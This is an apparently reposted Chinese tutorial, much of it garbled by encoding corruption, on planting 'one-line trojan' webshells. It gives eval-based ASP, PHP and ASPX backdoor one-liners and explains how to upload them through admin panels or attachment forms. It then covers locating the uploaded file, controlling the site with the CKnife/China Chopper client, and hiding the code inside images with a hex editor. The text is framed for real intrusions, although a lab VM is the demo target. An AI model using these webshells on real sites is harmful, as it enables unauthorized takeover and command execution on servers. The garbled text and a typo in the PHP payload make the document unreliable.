上传漏洞-一句话木马
聲明:為什么又寫(xiě)一篇關(guān)于一句話(huà)木馬,對(duì),我第一次沒(méi)寫(xiě)明白,直寫(xiě)了一句話(huà)木馬的簡(jiǎn)單制作,但是還是有很多同學(xué)真的看不懂,所以我今天改一下,這次精寫(xiě)!
上傳漏洞-一句話(huà)木馬
講述內(nèi)容:
- 一句話(huà)木馬 木馬使用技巧
- (中國(guó)菜刀、C32、CKnife)
簡(jiǎn)介:
- 一句話(huà)木馬
一句話(huà)木馬短小精悍,而且功能強(qiáng)大,隱蔽性非常好,在入侵中始終扮演著強(qiáng)大的作用
往目標(biāo)網(wǎng)站中加入一句話(huà)木馬,然后你就可以在本地通過(guò)中國(guó)菜刀chopper.exe即可獲取和控制整個(gè)網(wǎng)站目錄并可執(zhí)行一些web賬號(hào)所有權(quán)限的系統(tǒng)命令,進(jìn)入后滲透階段。但是發(fā)現(xiàn)百度上找到的菜刀都有后門(mén),而且找了很久都沒(méi)有找到可以用的菜刀,所以推薦兩款更好的kali下的工具:webacoo、Weevely 和windows下的工具:CKnife java版本的中國(guó)菜刀。
接下來(lái)我將演示CKnife java版本的中國(guó)菜刀的使用方法,并進(jìn)行講解
本程序需要設(shè)置 JAVA運(yùn)行環(huán)境
jdk32位 下載 http://www.uzzf.com/soft/395.html
jdk64位 下載 http://www.uzzf.com/soft/77216.html
CKnife java版本菜刀 下載 http://pan.baidu.com/s/1boyQTXH
使用
1.下載菜刀,打開(kāi)Cknife.jar軟件,選擇用java打開(kāi)
2.在上傳一句話(huà)漏洞時(shí),我們有兩個(gè)方法
<1.已經(jīng)有了網(wǎng)站后臺(tái)的登錄密碼以及賬號(hào),登錄網(wǎng)站后臺(tái)后上傳一句話(huà)木馬文件>
<2.在一些網(wǎng)站如論壇等等用戶(hù)可以上傳附件>//這種方法成功率不高,很多網(wǎng)站對(duì)附件有限制
在這里我用虛擬機(jī)搭一個(gè)靶機(jī),模擬網(wǎng)站服務(wù)器.
靶機(jī)IP地址為:192.168.138.131
3.模擬上傳木馬文件步驟到服務(wù)器
寫(xiě)法——
Asp一句話(huà):<%eval request(“xxx”)%>
Php 一句話(huà):<%php @eval($_POST[xxx]);?>
Aspx一句話(huà):<%@ Page Languag=”xxx”%><%eval(Request.Item[“xxx”])%>
(然后保存為相應(yīng)的文件格式并上傳)//xxx是連接的密碼,必須記住,重命名時(shí)不能有中文
4.找到我們上傳木馬的地址
如果是在真正的實(shí)戰(zhàn)中我們?cè)趺吹玫侥抉R的地址呢??
我們可以在前端找到我們上傳的附件,然后右擊審查屬性,就可以看到附件的地址。也可以在網(wǎng)站后臺(tái)找到附件存儲(chǔ)的位置
5.打開(kāi)Cknife.jar軟件
右鍵點(diǎn)擊添加,輸入上傳的php文件地址,php文件密碼,腳本類(lèi)型選擇PHP,字符編碼GB2312,點(diǎn)擊添加
6.右鍵文件管理就可以了
除了文件上傳還有圖片上傳,把一句話(huà)漏洞加載到圖片里面,通過(guò)文件上傳的方式上傳一句話(huà)木馬//圖片連接性不高,需要iis的解析漏洞,這個(gè)漏洞是很久以前的了,所以連接性不高
工具:C32反翻譯軟件
步驟:打開(kāi)C32反翻譯軟件→將圖片拖入軟件里面(16進(jìn)制模式)→在右面代碼最下端寫(xiě)入一句話(huà)代碼→另存為(后綴改為圖片原本的后綴)
寫(xiě)代碼是熱愛(ài),寫(xiě)到世界充滿(mǎn)愛(ài)!
總結(jié)
以上是生活随笔為你收集整理的上传漏洞-一句话木马的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Axure 激活码
- 下一篇: [转载]Visual Studio 20